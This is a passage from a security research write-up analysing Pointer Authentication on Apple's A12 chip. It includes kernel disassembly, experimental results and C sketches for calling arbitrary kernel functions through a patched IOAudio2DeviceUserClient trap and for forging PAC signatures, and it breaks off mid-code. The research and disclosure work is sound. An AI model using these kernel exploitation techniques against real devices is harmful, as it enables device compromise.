Pointer Authentication is designed to resist memory disclosure attacks. The PAC is computed using a cryptographically strong algorithm, so reading any number of authenticated pointers from memory would not make it easier to forge pointers.
The keys are stored in processor registers, and these registers are not accessible from usermode (EL0). Therefore, a memory disclosure vulnerability would not help extract the keys used for PAC generation.
While true, this description applies specifically to attacking a userspace program, not attacking the kernel itself. Recent iOS devices do not appear to be running a hypervisor (EL2) or secure monitor (EL3), meaning the kernel running at EL1 must manage its own PAC keys. And since the system registers that store them during normal operation will be cleared when the core goes to sleep, this means that the PAC keys must at some point be stored in kernel memory. Thus an attacker with kernel memory access could probably read the keys and use them to manually compute authentication codes for arbitrary pointers.
Of course, this approach assumes that we know what algorithm is being used under the hood to generate PACs so that we can implement it ourselves in userspace. Knowing Apple, there's a good chance they're using a custom algorithm in place of QARMA. If that's the case, then knowing the PAC keys wouldn't be sufficient to forge PACs: either we'd have to reverse engineer the silicon and determine the algorithm, or we'd have to find a way to reuse the existing machinery to forge pointers on our behalf.
Cross-EL PAC forgeries
Along the latter line of analysis, one possible way to do that would be to forge PACs for kernel pointers by executing the corresponding PAC* instructions in userspace. While this may sound naive, there are a few reasons this could work.
While unlikely, it's possible that Apple has decided to use the same PAC keys for EL0 and EL1, in which case we could forge a kernel PACIA signature (for example) by literally executing a PACIA instruction on the kernel pointer from userspace. You can see that the ARM pseudocode describing the implementation of PAC* instructions makes no distinction between whether this instruction was executed at EL0 or EL1.
Here's the pseudocode for AddPACIA(), which describes the implementation of PACIA-like instructions:
// AddPACIA()
// ==========
// Returns a 64-bit value containing X, but replacing the pointer
// authentication code field bits with a pointer authentication code, where the
// pointer authentication code is derived using a cryptographic algorithm as a
// combination of X, Y, and the APIAKey_EL1.

bits(64) AddPACIA(bits(64) X, bits(64) Y)
    boolean TrapEL2;
    boolean TrapEL3;
    bits(1)  Enable;
    bits(128) APIAKey_EL1;

    APIAKey_EL1 = APIAKeyHi_EL1<63:0>:APIAKeyLo_EL1<63:0>;

    case PSTATE.EL of
        when EL0
            boolean IsEL1Regime = S1TranslationRegime() == EL1;
            Enable = if IsEL1Regime then SCTLR_EL1.EnIA else SCTLR_EL2.EnIA;
            TrapEL2 = (EL2Enabled() && HCR_EL2.API == '0' &&
                       (HCR_EL2.TGE == '0' || HCR_EL2.E2H == '0'));
            TrapEL3 = HaveEL(EL3) && SCR_EL3.API == '0';
        when EL1
            Enable = SCTLR_EL1.EnIA;
            TrapEL2 = EL2Enabled() && HCR_EL2.API == '0';
            TrapEL3 = HaveEL(EL3) && SCR_EL3.API == '0';
        ...

    if Enable == '0' then return X;
    elsif TrapEL2 then TrapPACUse(EL2);
    elsif TrapEL3 then TrapPACUse(EL3);
    else return AddPAC(X, Y, APIAKey_EL1, FALSE);
And here's the pseudocode implementation of AddPAC():
// AddPAC()
// ========
// Calculates the pointer authentication code for a 64-bit quantity and then
// inserts that into pointer authentication code field of that 64-bit quantity.

bits(64) AddPAC(bits(64) ptr, bits(64) modifier, bits(128) K, boolean data)
    bits(64) PAC;
    bits(64) result;
    bits(64) ext_ptr;
    bits(64) extfield;
    bit selbit;
    boolean tbi = CalculateTBI(ptr, data);
    integer top_bit = if tbi then 55 else 63;

    // If tagged pointers are in use for a regime with two TTBRs, use bit<55> of
    // the pointer to select between upper and lower ranges, and preserve this.
    // This handles the awkward case where there is apparently no correct
    // choice between the upper and lower address range - ie an addr of
    // 1xxxxxxx0... with TBI0=0 and TBI1=1 and 0xxxxxxx1 with TBI1=0 and
    // TBI0=1:
    if PtrHasUpperAndLowerAddRanges() then
        ...
    else selbit = if tbi then ptr<55> else ptr<63>;

    integer bottom_PAC_bit = CalculateBottomPACBit(selbit);

    // The pointer authentication code field takes all the available bits in
    // between
    extfield = Replicate(selbit, 64);

    // Compute the pointer authentication code for a ptr with good extension bits
    if tbi then
        ext_ptr = ptr<63:56>:extfield<(56-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>;
    else
        ext_ptr = extfield<(64-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>;

    PAC = ComputePAC(ext_ptr, modifier, K<127:64>, K<63:0>);

    // Check if the ptr has good extension bits and corrupt the pointer
    // authentication code if not;
    if !IsZero(ptr<top_bit:bottom_PAC_bit>) && !IsOnes(ptr<top_bit:bottom_PAC_bit>) then
        PAC<top_bit-1> = NOT(PAC<top_bit-1>);

    // Preserve the determination between upper and lower address at bit<55>
    // and insert PAC
    if tbi then
        result = ptr<63:56>:selbit:PAC<54:bottom_PAC_bit>:ptr<bottom_PAC_bit-1:0>;
    else
        result = PAC<63:56>:selbit:PAC<54:bottom_PAC_bit>:ptr<bottom_PAC_bit-1:0>;
    return result;
Operationally, there are no significant differences between executing PACIA at EL0 and EL1, which means that if Apple has used the same PAC keys for both exception levels, we can simply execute PACIA in userspace to sign kernel pointers.
Of course, it seems highly unlikely that Apple has left such an obvious hole in their implementation. Even so, the symmetry between EL0 and EL1 means that we could potentially forge kernel PACIA signatures by reading the kernel's PAC keys, replacing the userspace PAC keys for one thread in our process with the kernel PAC keys, and then executing PACIA in userspace in that thread. This would be useful if Apple is using an unknown algorithm in place of QARMA, since we could reuse the existing signing machinery without having to reverse engineer it.
Cross-key PAC forgeries
Another symmetry that we could potentially leverage to produce PAC forgeries is between the different PAC keys: PACIA, PACIB, PACDA, and PACDB all reduce to the same implementation under the hood, just using different keys. Thus, if we can replace one PAC key with another, we can turn signing gadgets for one key into signing gadgets for another key.
This would be useful if, for example, the PAC algorithm is unknown and there is something that prevents us from setting the userspace PAC keys equal to the kernel PAC keys so that we can perform cross-EL forgeries. While this forgery strategy is much less powerful, since we'd need to rely on the existence of PAC signing gadgets (which are a known limitation of PAC), this technique would free us from the restriction that the signing gadget use the same key that we're trying to forge, potentially diversifying the set of available gadgets.
Finding an entry point for kernel code execution
Now that we have some theoretical ideas of how we might try and defeat PAC on A12 devices, let's look at the other end and figure out how we could use a PAC bypass to execute arbitrary code in the kernel.
The traditional way to get kernel code execution via read/write is the iokit_user_client_trap() strategy described by Stefan Esser in Tales from iOS 6 Exploitation. This strategy involves patching the vtable of an IOUserClient instance so that calling the userspace function IOConnectTrap6(), which invokes iokit_user_client_trap() in the kernel, will call an arbitrary function with up to 7 arguments. To see why this works, here's the implementation of iokit_user_client_trap() from XNU 4903.221.2:
kern_return_t iokit_user_client_trap(struct iokit_user_client_trap_args *args)
{
    kern_return_t result = kIOReturnBadArgument;
    IOUserClient *userClient;

    if ((userClient = OSDynamicCast(IOUserClient,
            iokit_lookup_connect_ref_current_task((mach_port_name_t)
                (uintptr_t)args->userClientRef)))) {
        IOExternalTrap *trap;
        IOService *target = NULL;

        trap = userClient->getTargetAndTrapForIndex(&target, args->index);

        if (trap && target) {
            IOTrap func;

            func = trap->func;

            if (func) {
                result = (target->*func)(args->p1, args->p2, args->p3,
                                         args->p4, args->p5, args->p6);
            }
        }

        iokit_remove_connect_reference(userClient);
    }

    return result;
}
If we can patch the IOUserClient instance such that getTargetAndTrapForIndex() returns controlled values for trap and target, then the (target->*func) invocation above will call an arbitrary kernel function with up to 7 controlled arguments (target plus p1 through p6).
To see how this strategy would work on A12 devices, let's examine the changes to this function introduced by PAC. This is easiest to understand by looking at the disassembly:
iokit_user_client_trap
    PACIBSP
    ...        ;; Call iokit_lookup_connect_ref_current_task() on
    ...        ;; args->userClientRef and cast the result to IOUserClient.

loc_FFFFFFF00808FF00
    STR        XZR, [SP,#0x30+var_28]  ;; target = NULL
    LDR        X8, [X19]               ;; x19 = userClient, x8 = ->vtable
    AUTDZA     X8                      ;; validate vtable's PAC
    ADD        X9, X8, #0x5C0          ;; x9 = pointer to vmethod in vtable
    LDR        X8, [X8,#0x5C0]         ;; x8 = vmethod getTargetAndTrapForIndex
    MOVK       X9, #0x2BCB,LSL#48      ;; x9 = 2BCB`vmethod_pointer
    LDR        W2, [X20,#8]            ;; w2 = args->index
    ADD        X1, SP, #0x30+var_28    ;; x1 = &target
    MOV        X0, X19                 ;; x0 = userClient
    BLRAA      X8, X9                  ;; PAC call ->getTargetAndTrapForIndex
    LDR        X9, [SP,#0x30+var_28]   ;; x9 = target
    CMP        X0, #0
    CCMP       X9, #0, #4, NE
    B.EQ       loc_FFFFFFF00808FF84    ;; if !trap || !target
    LDP        X8, X11, [X0,#8]        ;; x8 = trap->func, x11 = func virtual?
    AND        X10, X11, #1
    ORR        X12, X10, X8
    CBZ        X12, loc_FFFFFFF00808FF84       ;; if !func
    ADD        X0, X9, X11,ASR#1       ;; x0 = target
    CBNZ       X10, loc_FFFFFFF00808FF58
    MOV        X9, #0                  ;; Use context 0 for non-virtual func
    B          loc_FFFFFFF00808FF70

loc_FFFFFFF00808FF58
    ...        ;; Handle the case where trap->func is a virtual method.

loc_FFFFFFF00808FF70
    LDP        X1, X2, [X20,#0x10]     ;; x1 = args->p1, x2 = args->p2
    LDP        X3, X4, [X20,#0x20]     ;; x3 = args->p3, x4 = args->p4
    LDP        X5, X6, [X20,#0x30]     ;; x5 = args->p5, x6 = args->p6
    BLRAA      X8, X9                  ;; PAC call func(target, p1, ..., p6)
    MOV        X21, X0

loc_FFFFFFF00808FF84
    ...        ;; Call iokit_remove_connect_reference().

loc_FFFFFFF00808FF8C
    ...        ;; Epilogue.
    RETAB
As you can see, there are several places where PACs are authenticated. The first, which was omitted from the assembly for brevity, happens when performing the dynamic cast to IOUserClient. Then userClient's vtable is validated and a PAC-protected call to getTargetAndTrapForIndex() is made. After that, the trap->func field is read without validation, and finally the value func is validated with context 0 and called.
This is actually about the best case we could reasonably hope for as attackers. If we can find a legitimate user client that provides an implementation of getTargetAndTrapForIndex() that returns a pointer to an IOExternalTrap residing in writable memory, then all we have to do is replace trap->func with a PACIZA'd function pointer (that is, a pointer signed under APIAKey with context 0). That means only a partial PAC bypass, such as the ability to forge just PACIZA pointers, would be sufficient.
A quick search through the kernelcache revealed a unique IOUserClient class, IOAudio2DeviceUserClient, that fit these criteria. Here's a decompilation of its getTargetAndTrapForIndex() method:
IOExternalTrap *IOAudio2DeviceUserClient::getTargetAndTrapForIndex(
        IOAudio2DeviceUserClient *this, IOService **target, unsigned int index)
{
    ...
    *target = (IOService *)this;
    return &this->IOAudio2DeviceUserClient.traps[index];
}
The traps field is initialized in the method IOAudio2DeviceUserClient::initializeExternalTrapTable() to a heap-allocated IOExternalTrap object:
this->IOAudio2DeviceUserClient.trap_count = 1;
this->IOAudio2DeviceUserClient.traps = IOMalloc(sizeof(IOExternalTrap));
Thus, all we need to do to call an arbitrary kernel function is create our own IOAudio2DeviceUserClient connection, forge a PACIZA pointer to the function we want to call, overwrite the userClient->traps[0].func field with the PACIZA'd pointer, and invoke IOConnectTrap6() from userspace. This will give us control of all arguments except X0, which is explicitly set to this by IOAudio2DeviceUserClient's implementation of getTargetAndTrapForIndex().
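On the userspace side, the invocation is just a trap call; a minimal sketch (it assumes the kernel read/write primitive has already replaced traps[0].func with a forged PACIZA'd pointer, and that audio2_client is an open IOAudio2DeviceUserClient connection):

#include <cstdint>
#include <IOKit/IOKitLib.h>

// Call an arbitrary kernel function through the patched trap table. X0 is
// fixed to the user client itself by getTargetAndTrapForIndex(), so only
// p1 through p6 are controlled here.
kern_return_t call_kernel_function(io_connect_t audio2_client,
                                   uintptr_t p1, uintptr_t p2, uintptr_t p3,
                                   uintptr_t p4, uintptr_t p5, uintptr_t p6) {
    // Trap index 0: initializeExternalTrapTable() sets trap_count = 1.
    return IOConnectTrap6(audio2_client, 0, p1, p2, p3, p4, p5, p6);
}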
To gain control of X0 alongside X1 through X6, we'll need to replace IOAudio2DeviceUserClient's implementation of getTargetAndTrapForIndex() in the vtable. This means that, in addition to forging the PACIZA pointer to the function we want to call, we'll also need to create a fake vtable consisting of PACIA'd pointers to the virtual methods, and we'll need to replace the existing vtable pointer with a PACDZA'd pointer to the fake vtable. This requires a significantly broader PAC forgery capability.
However, even if we only manage to produce PACIZA forgeries, there's still a way to gain control of X0: JOP gadgets. A quick search through the kernelcache revealed the following gadget that sets X0:
MOV         X0, X4
BR          X5
This gives us a way to call arbitrary kernel functions with 4 fully controlled arguments using just a single forged pointer: use iokit_user_client_trap() to call a PACIZA'd pointer to this gadget with X1 through X3 set how we want them for the function call, X4 set to our desired value for X0, and X5 set to the target function we want to call.
Analyzing PAC on the A12
Now that we know how we can use PAC forgery to call arbitrary kernel functions, let's begin analyzing Apple's implementation of PAC on the A12 SoC for weaknesses. Ideally we'll find a way to perform both PACIA and PACDA forgeries, but as previously discussed, even the ability to forge a single PACIZA pointer will be sufficient to call arbitrary kernel functions with up to 4 arguments.
To actually perform my analysis, I used the voucher_swap exploit to get kernel read/write on an iPhone XR running iOS 12.1.1 build 16C50.
Finding where PAC keys are set
My first step was to identify where in the kernel's code the PAC keys were being set. Unfortunately, IDA does not display names for the special registers used to store the PAC keys, so I had to do a bit of digging.
Searching for "APIAKey" in the LLVM repository mirror on GitHub revealed that the registers used to store the APIAKey are called APIAKeyLo_EL1 and APIAKeyHi_EL1, and the registers for other keys are similarly named. Furthermore, the file AArch64SystemOperands.td declares the codes for these registers. This allows us to easily search for these registers in IDA. For example, to find where APIAKeyLo_EL1 is set, I searched for the string "#0, c2, c1, #0". This brought me to what I identified as part of common_start, from osfmk/arm64/start.s:
_WriteStatusReg(TCR_EL1, sysreg_restore);               // 3, 0, 2, 0, 2
PPLTEXT__set__TTBR0_EL1(x25 & 0xFFFFFFFFFFFF);
_WriteStatusReg(TTBR1_EL1, (x25 + 0x4000) & 0xFFFFFFFFFFFF);    // 3, 0, 2, 0, 1
_WriteStatusReg(MAIR_EL1, 0x44F00BB44FF);               // 3, 0, 10, 2, 0
if ( x21 )
    _WriteStatusReg(TTBR1_EL1, cpu_ttep);               // 3, 0, 2, 0, 1
_WriteStatusReg(VBAR_EL1, ExceptionVectorsBase + x22 - x23);    // 3, 0, 12, 0, 0
do
    x0 = _ReadStatusReg(S3_4_C15_C0_4);                 // ????
while ( !(x0 & 2) );
_WriteStatusReg(S3_4_C15_C0_4, x0 | 5);                 // ????
__isb(0xF);
_WriteStatusReg(APIBKeyLo_EL1, 0xFEEDFACEFEEDFACF);     // 3, 0, 2, 1, 2
_WriteStatusReg(APIBKeyHi_EL1, 0xFEEDFACEFEEDFACF);     // 3, 0, 2, 1, 3
_WriteStatusReg(APDBKeyLo_EL1, 0xFEEDFACEFEEDFAD0);     // 3, 0, 2, 2, 2
_WriteStatusReg(APDBKeyHi_EL1, 0xFEEDFACEFEEDFAD0);     // 3, 0, 2, 2, 3
_WriteStatusReg(S3_4_C15_C1_0, 0xFEEDFACEFEEDFAD1);     // ????
_WriteStatusReg(S3_4_C15_C1_1, 0xFEEDFACEFEEDFAD1);     // ????
_WriteStatusReg(APIAKeyLo_EL1, 0xFEEDFACEFEEDFAD2);     // 3, 0, 2, 1, 0
_WriteStatusReg(APIAKeyHi_EL1, 0xFEEDFACEFEEDFAD2);     // 3, 0, 2, 1, 1
_WriteStatusReg(APDAKeyLo_EL1, 0xFEEDFACEFEEDFAD3);     // 3, 0, 2, 2, 0
_WriteStatusReg(APDAKeyHi_EL1, 0xFEEDFACEFEEDFAD3);     // 3, 0, 2, 2, 1
_WriteStatusReg(APGAKeyLo_EL1, 0xFEEDFACEFEEDFAD4);     // 3, 0, 2, 3, 0
_WriteStatusReg(APGAKeyHi_EL1, 0xFEEDFACEFEEDFAD4);     // 3, 0, 2, 3, 1
_WriteStatusReg(SCTLR_EL1, 0xFC54793D);                 // 3, 0, 1, 0, 0
__isb(0xF);
_WriteStatusReg(CPACR_EL1, 0x300000);                   // 3, 0, 1, 0, 2
_WriteStatusReg(TPIDR_EL1, 0);                          // 3, 0, 13, 0, 4
This is very interesting, since it looks like common_start sets the PAC keys to constant values every time a core starts up! Thinking that perhaps this was an artifact of the decompilation, I checked the disassembly:
common_start+A8
    LDR        X0, =0xFEEDFACEFEEDFACF ;; x0 = pac_key
    MSR        #0, c2, c1, #2, X0      ;; APIBKeyLo_EL1
    MSR        #0, c2, c1, #3, X0      ;; APIBKeyHi_EL1
    ADD        X0, X0, #1
    MSR        #0, c2, c2, #2, X0      ;; APDBKeyLo_EL1
    MSR        #0, c2, c2, #3, X0      ;; APDBKeyHi_EL1
    ADD        X0, X0, #1
    MSR        #4, c15, c1, #0, X0     ;; ????
    MSR        #4, c15, c1, #1, X0     ;; ????
    ADD        X0, X0, #1
    MSR        #0, c2, c1, #0, X0      ;; APIAKeyLo_EL1
    MSR        #0, c2, c1, #1, X0      ;; APIAKeyHi_EL1
    ADD        X0, X0, #1
    MSR        #0, c2, c2, #0, X0      ;; APDAKeyLo_EL1
    MSR        #0, c2, c2, #1, X0      ;; APDAKeyHi_EL1
...
pac_key    DCQ 0xFEEDFACEFEEDFACF      ; DATA XREF: common_start+A8↑r
No, common_start really was initializing all the PAC keys to constant values. This was quite surprising: clearly Apple knows that using constant PAC keys breaks all of PAC's security guarantees. So I figured there must be some other place the PAC keys were being initialized to their true runtime values.
But after much searching, this appeared to be the only location in the kernelcache that was setting the A keys and the general key. Still, it did appear that the B keys were being set in a few more places:
machine_load_context+A8
    LDR        X1, [X0,#0x458]
    ...
    MSR        #0, c2, c1, #2, X1      ;; APIBKeyLo_EL1
    MSR        #0, c2, c1, #3, X1      ;; APIBKeyHi_EL1
    ADD        X1, X1, #1
    MSR        #0, c2, c2, #2, X1      ;; APDBKeyLo_EL1
    MSR        #0, c2, c2, #3, X1      ;; APDBKeyHi_EL1
Call_continuation+10
    LDR        X5, [X4,#0x458]
    ...
    MSR        #0, c2, c1, #2, X5      ;; APIBKeyLo_EL1
    MSR        #0, c2, c1, #3, X5      ;; APIBKeyHi_EL1
    ADD        X5, X5, #1
    MSR        #0, c2, c2, #2, X5      ;; APDBKeyLo_EL1
    MSR        #0, c2, c2, #3, X5      ;; APDBKeyHi_EL1
Switch_context+11C
    LDR        X3, [X2,#0x458]
    ...
    MSR        #0, c2, c1, #2, X3      ;; APIBKeyLo_EL1
    MSR        #0, c2, c1, #3, X3      ;; APIBKeyHi_EL1
    ADD        X3, X3, #1
    MSR        #0, c2, c2, #2, X3      ;; APDBKeyLo_EL1
    MSR        #0, c2, c2, #3, X3      ;; APDBKeyHi_EL1
Idle_load_context+88
    LDR        X1, [X0,#0x458]
    ...
    MSR        #0, c2, c1, #2, X1      ;; APIBKeyLo_EL1
    MSR        #0, c2, c1, #3, X1      ;; APIBKeyHi_EL1
    ADD        X1, X1, #1
    MSR        #0, c2, c2, #2, X1      ;; APDBKeyLo_EL1
    MSR        #0, c2, c2, #3, X1      ;; APDBKeyHi_EL1
These are the only other places in the kernel that set PAC keys, and they all follow the same pattern: a 64-bit load from offset 0x458 into some data structure (later identified as struct thread), then setting the APIBKey to that value concatenated with itself, and setting the APDBKey to that value plus one concatenated with itself.
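In C-like terms, the pattern amounts to this (the struct and function names are mine; the 0x458 offset is from this iOS 12.1.1 kernelcache):

#include <cstdint>

struct BKeys { uint64_t ib_lo, ib_hi, db_lo, db_hi; };

// Derive the B keys from the per-thread value, mirroring the MSR sequences
// above: APIBKey = key:key, APDBKey = (key+1):(key+1).
BKeys derive_b_keys(uint64_t thread_key /* *(uint64_t *)(thread + 0x458) */) {
    return { thread_key, thread_key, thread_key + 1, thread_key + 1 };
}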
Furthermore, all of these locations deal specifically with context switching between threads; conspicuously absent from this list is any indication that the PAC keys are changed when transitioning between exception levels, either on kernel entry (e.g. via a syscall) or on kernel exit (via ERET*). This would be a strong indication that the PAC keys are indeed shared between userspace and the kernel.
(I subsequently learned that @ProteasWang discovered the same thing I did: a GitHub gist called pac-set-key.md lists only the previously mentioned locations.)
If my understanding was correct, this seemed to suggest three disturbing and, frankly, highly unlikely things. First, contrary to all rules of cryptography, it appeared that the kernel was using constant values for the A keys and the general key. Second, the keys seemed to be effectively 64 bits, since the first and second halves of the 128-bit key are the same. And third, the PAC keys appeared to be shared between userspace and the kernel, meaning userspace could forge kernel PAC signatures. Could Apple's implementation really be that broken? Or was something else going on?

Observing runtime behavior

In order to find out, I conducted a simple experiment: I read the value of a global PACIZA'd function pointer in the __DATA_CONST.__const section over many different boots, recording the value of the kASLR slide each time. Since the number of possible kernel slide values is relatively small, it shouldn't be too long before I get two separate boots with the kernel at the exact same location in memory, meaning that the original, non-PAC'd value of the pointer would be the same both times. Then, if the A keys really are constant, the value of the PACIZA'd pointer should be the same in both boots, since the signing algorithm is deterministic and the pointer and context values being signed are the same both times.
As a target, I chose to read sysclk_ops.c_gettime, which is a pointer to the function rtclock_gettime(). The results of this experiment over 30 trials are listed below, with colliding runs marked:
slide = 000000000ce00000, c_gettime = b2902c70147f2050
slide = 0000000023200000, c_gettime = 61e2c2f02abf2050
slide = 0000000023000000, c_gettime = d98e57f02a9f2050
slide = 0000000006e00000, c_gettime = 0b9613700e7f2050
slide = 000000001ce00000, c_gettime = c3822bf0247f2050
slide = 0000000004600000, c_gettime = 00d248f00bff2050
slide = 000000001fe00000, c_gettime = 6aa61ef0277f2050   <-- same slide
slide = 0000000013400000, c_gettime = fda847701adf2050
slide = 0000000015a00000, c_gettime = c5883b701d3f2050
slide = 000000000a200000, c_gettime = bbe37ef011bf2050   <-- same slide
slide = 0000000014200000, c_gettime = a8ff9f701bbf2050
slide = 0000000014800000, c_gettime = 20e538701c1f2050
slide = 0000000019800000, c_gettime = 66f61b70211f2050
slide = 000000001c200000, c_gettime = 24aea37023bf2050   <-- same slide
slide = 0000000006c00000, c_gettime = 5a9b42f00e5f2050
slide = 000000000e200000, c_gettime = 128526f015bf2050
slide = 000000001fa00000, c_gettime = 4cf2ad70273f2050
slide = 000000000a200000, c_gettime = 6ed3177011bf2050   <-- same slide
slide = 000000000ea00000, c_gettime = 869d0f70163f2050
slide = 0000000015800000, c_gettime = 9898c2f01d1f2050
slide = 000000001d400000, c_gettime = 52a343f024df2050
slide = 000000001d600000, c_gettime = 7ea2337024ff2050
slide = 0000000023e00000, c_gettime = 31d3b3f02b7f2050
slide = 0000000008e00000, c_gettime = 27a72cf0107f2050
slide = 000000000fa00000, c_gettime = 2b988f70173f2050
slide = 0000000011000000, c_gettime = 86c7a670189f2050
slide = 0000000011a00000, c_gettime = 3d8103f0193f2050
slide = 000000001c200000, c_gettime = 56d444f023bf2050   <-- same slide
slide = 000000001fe00000, c_gettime = 82fa3970277f2050   <-- same slide
slide = 0000000008c00000, c_gettime = 89dcda70105f2050
As you can see, even though by all accounts the IA key is the same, PACIZAs for the same pointer generated across different boots are somehow different.
The most straightforward solution I could think of was that iBoot or the kernel might be overwriting pac_key with a random value each boot before common_start runs, so that the PAC keys really are different each boot. Even though pac_key resides in __TEXT_EXEC.__text, which is protected against writes by KTRR, it's still possible to modify __TEXT_EXEC.__text before KTRR lockdown is performed. However, reading pac_key at runtime showed it still contained the value 0xfeedfacefeedfacf, so something else must be going on.
I next performed an experiment to determine whether the PAC keys really were shared between userspace and the kernel, as the code suggested. I executed the PACIZA instruction in userspace on the address of the rtclock_gettime() function, and then compared against the PACIZA'd sysclk_ops.c_gettime pointer read from kernel memory. These two values differed despite the fact that the PAC keys should be the same in userspace and the kernel, so once again it appeared that the A12 was conjuring some sort of dark magic.
Still not quite believing that pac_key wasn't being modified at runtime, I tried enumerating the B-key values of all threads on the system to see whether they really matched the 0xfeedfacefeedfacf value suggested by the code. Looking at the code for Switch_context in osfmk/arm64/cswitch.s, I determined that the value used as a seed to compute the B keys was being loaded from offset 0x458 of struct thread, the Mach struct representing a thread. This field is not present in the public XNU sources, so I decided to name it pac_key_seed. My experiment consisted of walking the global thread list and dumping each thread's pac_key_seed.
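With the kernel read primitive from voucher_swap in hand, reading a seed is nearly a one-liner. A minimal sketch, assuming a kread64() kernel read primitive and the thread-list walk from the exploit:

// Hedged sketch: read the B-key seed that Switch_context loads for a
// given thread. kread64() is the assumed kernel read primitive; 0x458
// is the pac_key_seed offset observed in this kernelcache build.
static uint64_t thread_pac_seed(uint64_t thread /* kernel address of struct thread */) {
    return kread64(thread + 0x458);
}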
I found that all kernel threads were indeed using the 0xfeedfacefeedfacf PAC key seed, while threads for userspace processes were using different, random seeds:
pid   0  thread ffffffe00092c000  pac_seed feedfacefeedfacf
pid   0  thread ffffffe00092c550  pac_seed feedfacefeedfacf
pid   0  thread ffffffe00092caa0  pac_seed feedfacefeedfacf
...
pid 258  thread ffffffe003597520  pac_seed 51c6b449d9c6e7a3
pid 258  thread ffffffe003764aa0  pac_seed 51c6b449d9c6e7a3
Thus, it did seem like the PAC keys for kernel threads were being initialized the same each boot, and yet the PAC'd pointers were different across boots. Something fishy was going on.

Bypass attempts

I next turned my attention to bypassing PAC using the weaknesses identified in the section "Weaknesses against kernel attackers".
Since executing the same PACIZA instruction on the same pointer value with the same PAC keys across different boots was producing different results, there must be some unidentified source of per-boot randomness. This basically spelled doom for the "implement QARMA-64 in userspace and compute PACs manually" strategy, but I decided to try it anyway. Unsurprisingly, this did not work.
Next I looked at whether I could set my own thread's PAC keys equal to the kernel PAC keys and forge kernel pointers in userspace. Ideally this would mean I'd set my IA key equal to the kernel's IA key, namely 0xfeedfacefeedfad2. However, as previously discussed, there's only one place in the kernel that appears to set the A keys, common_start, and yet userspace and kernel PAC codes are different anyway.
So I decided to combine this approach with the PAC cross-key symmetry weakness and instead set my thread's IB key equal to the kernel's IA key, which should allow me to forge kernel PACIZA pointers by executing PACIZB in userspace.
Unfortunately, the naive way of doing this, by overwriting the pac_key_seed field in the current thread, would probably crash or panic the system, since changing PAC keys during a thread's lifetime will break the thread's existing PAC signatures. And PAC signatures are checked all the time, most frequently when returning from a function via RETAB. This means that the only way to guarantee that changing a thread's PAC keys doesn't crash it or trigger a panic is to ensure that the thread does not call or return from any functions while the keys have been changed.
The easiest way to do this is to spawn a thread that infinite loops in userspace executing PACIZB and storing the result to a global variable. Then we can overwrite the thread's pac_key_seed and force the thread off-core using contention; once the looping thread is rescheduled, its B keys will be set via Switch_context and the forgery will be executed.
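As a rough illustration, the looping thread might look like the sketch below (assuming an arm64e toolchain; the pac_key_seed overwrite and the contention that forces a reschedule happen elsewhere):

#include <stdatomic.h>
#include <stdint.h>

static _Atomic uint64_t forgery;    // result slot polled by the main thread

// Sign the target pointer with the IB key and a zero context, forever.
// The loop makes no calls and never returns, so swapping this thread's
// pac_key_seed out from under it can't break any live PAC signatures.
// Once Switch_context reloads the B keys from the new seed, the stored
// value becomes our forgery.
static void *forge_loop(void *arg) {
    uint64_t target = (uint64_t)arg;
    for (;;) {
        uint64_t value = target;
        __asm__ volatile("pacizb %0" : "+r"(value));
        atomic_store(&forgery, value);
    }
    return NULL;
}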
However, once again, this experiment was unsuccessful:
gettime       = fffffff0161f2050
kPACIZA       = faef2270161f2050
uPACIZA       = 138a8670161f2050
uPACIZB forge = d7fd0ff0161f2050
It seemed that the A12 manages to break either cross-EL PAC symmetry or cross-key PAC symmetry.
To gain a bit more insight, I devised a test specifically for cross-key PAC symmetry. This meant setting my thread's IB key equal to the DB key and checking whether the outputs of PACIZB and PACDZB looked similar, indicating that the same PAC was generated. Since the IB and DB keys are generated from the same seed and cannot be set independently, this actually involved 2 trials: first with seed value 0x11223344, and next with seed value 0x11223345:
IB = 0x11223344  uPACIZB = 0028180100000000
DB = 0x11223345  uPACDZB = 00679e0100000000   <--
IB = 0x11223345  uPACIZB = 003ea80100000000   <--
DB = 0x11223346  uPACDZB = 0023c58100000000
The marked rows show the result of executing PACDZB and PACIZB on the same value from userspace with the same keys. On a standard ARMv8.3 implementation of Pointer Authentication, we'd expect most of the bits of the PAC to agree. However, the two PACs seem unrelated, suggesting that the A12 does indeed manage to break cross-key PAC symmetry.

Implementation theories

With all three weaknesses suggested by the original design demonstrably not applicable to the A12, it was time to try and work out what was really going on here.
It's clear that Apple had considered the fact that Pointer Authentication as defined in the standard would do little to protect against kernel attackers with read/write, and thus they decided to implement a more robust defense. It's impossible to know what exactly they did without a concerted reverse engineering effort, but we can speculate based on the observed behavior.
My first thought was that Apple had decided to implement a secure monitor again, like it had done on prior devices with Watchtower to protect against kernel patches. If the secure monitor could trap transitions between exception levels and trap writes to the PAC key registers, it could hide the true PAC keys from the kernel and implement other shenanigans to break PAC symmetries. However, I couldn't find evidence of a secure monitor inside the kernelcache.
Another alternative is that Apple has decided to move the true PAC keys into the A12 itself, so that even the most powerful software attacker doesn't have the ability to read the keys. The keys could be generated randomly on boot or set via special registers by iBoot. Then, the keys that are fed to QARMA-64 (or whatever algorithm is actually being used to generate PACs) would be some combination of the random key, the standard key set via special registers, and the current exception level.
For example, the A12 could theoretically store 10 random 128-bit PAC keys, one for each pair of an exception level (EL0 or EL1) and a standard PAC key (IA, IB, DA, DB, or GA). Then the PAC key used for any particular operation could be the XOR of the random PAC key corresponding to the operation (e.g. IB-EL0 for a PACIB instruction in userspace) with the standard PAC key set via the standard registers (e.g. APIBKey). Such a design wouldn't come without challenges (for example, you'd need a non-volatile place to store the random keys for when the core sleeps), but it would cleanly break the cross-EL and cross-key symmetries and prevent the keys from ever being disclosed, completely mitigating the three previously identified weaknesses.
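To make the hypothesis concrete, here is a purely speculative model of that derivation. None of these names or structures come from Apple; this is just one way the observed behavior could be produced:

#include <stdint.h>

typedef struct { uint64_t lo, hi; } pac_key_t;

enum { KEY_IA, KEY_IB, KEY_DA, KEY_DB, KEY_GA, KEY_COUNT };

// Hypothetical per-boot secrets held inside the SoC, indexed by
// exception level (EL0/EL1) and key, never architecturally visible.
static pac_key_t soc_secret[2][KEY_COUNT];

// The key actually fed to the PAC cipher mixes the hidden secret with
// the architectural key register. Leaking the register value is then
// useless, and both cross-EL and cross-key symmetry disappear.
static pac_key_t effective_key(int el, int key, pac_key_t arch_reg) {
    pac_key_t k = soc_secret[el][key];
    k.lo ^= arch_reg.lo;
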